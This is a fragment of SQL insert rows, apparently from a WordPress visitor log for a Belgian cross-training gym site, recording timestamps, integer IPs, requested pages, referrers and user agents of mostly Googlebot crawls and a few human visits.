(78751, 1560523056.684624, 1430572848, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', 'https://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),
(78752, 1560523059.078911, 1430572848, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),
(78753, 1560523069.268998, 1430572848, 1, 0, 0, 0, 0, 'http://www2.crosstrainingcenter.be/contact/', 'http://www2.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),
(78754, 1560609287.300862, 1123632422, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78755, 1560609287.760107, 1123632422, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78756, 1560628229.011172, 1123632443, 0, 0, 1, 0, 1, 'https://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78757, 1560628229.456845, 1123632443, 0, 1, 1, 0, 1, 'https://www2.crosstrainingcenter.be/.well-known/assetlinks.json', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78758, 1560678296.024082, 1123632422, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78759, 1560716923.231132, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78760, 1560716923.688243, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78761, 1560725434.646891, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78762, 1560765039.138354, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78763, 1560768641.338034, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78764, 1560784905.133668, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78765, 1560812600.643862, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78766, 1560812601.055760, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78767, 1560834685.056868, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78768, 1561449956.677011, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78769, 1561510235.321630, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78770, 1561526540.342185, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78771, 1561533186.760370, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78772, 1561562842.095500, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78773, 1561562842.569282, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78774, 1561597288.425131, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78775, 1561640847.630281, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78776, 1561641443.868543, 1123631284, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78777, 1561684266.838906, 1123632422, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78778, 1561684267.260691, 1123632422, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78779, 1561719907.303805, 1123632422, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78780, 1561729556.092320, 1123632422, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78781, 1561756662.428336, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78782, 1561772308.167076, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78783, 1561772308.630402, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78784, 1561803036.233015, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78785, 1561837490.696126, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78786, 1561900588.694512, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78787, 1561908859.719655, 1834531253, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.com/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'),
(78788, 1561908860.949484, 1834531253, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'),
(78789, 1561908902.738862, 1834531253, 1, 0, 0, 0, 0, 'http://www2.crosstrainingcenter.be/le-cross-training/', 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'),
(78790, 1561908908.645299, 1834531253, 1, 0, 0, 0, 0, 'http://www2.crosstrainingcenter.be/notre-philosophie/', 'http://www2.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'),
(78791, 1561908910.352315, 1834531253, 1, 0, 0, 0, 0, 'http://www2.crosstrainingcenter.be/contact/', 'http://www2.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'),
(78792, 1561934673.955021, 3639886537, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(78793, 1561936021.048572, 3639886537, 0, 1, 0, 0, 1, 'http://www2.crosstrainingcenter.be/contact-2/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(78794, 1561964173.460477, 1463961952, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/', 'https://www.google.com/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'),
(78795, 1561964174.674751, 1463961952, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'),
(78796, 1561964183.738311, 1463961952, 1, 0, 0, 0, 0, 'http://www2.crosstrainingcenter.be/contact/', 'http://www2.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'),
(78797, 1561964190.759817, 1463961952, 1, 0, 0, 0, 0, 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'http://www2.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'),
(78798, 1561989875.782890, 1123632422, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78799, 1561989876.240896, 1123632422, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78800, 1561990077.979628, 1123632422, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78801, 1562136862.207503, 1123631526, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78802, 1562136862.648659, 1123631526, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78803, 1562168767.871428, 1123631526, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78804, 1562207924.165555, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78805, 1562501745.131746, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78806, 1562501745.594880, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78807, 1562508495.368953, 1439284614, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.com/', 'Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-A310F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.2 Chrome/67.0.3396.87 Mobile Safari/537.36'),
(78808, 1562508496.999933, 1439284614, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-A310F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.2 Chrome/67.0.3396.87 Mobile Safari/537.36'),
(78809, 1562533712.853048, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78810, 1562580936.687007, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78811, 1562879797.209752, 1123631280, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78812, 1562879797.732147, 1123631280, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78813, 1562927356.016808, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78814, 1562981056.736859, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78815, 1562981057.165991, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78816, 1563012328.160372, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78817, 1563176412.431651, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78818, 1563266395.967214, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78819, 1563266396.387646, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78820, 1563325447.318185, 1123632422, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78821, 1563364425.044898, 1123632422, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78822, 1563370680.536619, 1123632422, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78823, 1563730915.463656, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78824, 1563730915.936644, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78825, 1563766501.225714, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78826, 1563831822.651695, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78827, 1563831823.078203, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78828, 1563866712.925880, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78829, 1564217147.272139, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78830, 1564217147.701750, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78831, 1564264910.472474, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78832, 1564307491.356473, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78833, 1564307491.815585, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78834, 1564601740.901840, 1837498020, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'),
(78835, 1564601742.859038, 1837498020, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'),
(78836, 1564735810.559096, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78837, 1564735811.066790, 1123634950, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78838, 1564901285.734068, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78839, 1564901286.167003, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78840, 1564937048.107463, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78841, 1564981078.016814, 1123633938, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78842, 1565340879.382786, 1123631835, 0, 0, 1, 0, 1, 'https://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78843, 1565340879.842633, 1123631835, 0, 1, 1, 0, 1, 'https://www2.crosstrainingcenter.be/.well-known/assetlinks.json', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78844, 1565356306.310216, 3576813415, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', 'https://www.google.com/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0'),
(78845, 1565356307.575194, 3576813415, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0'),
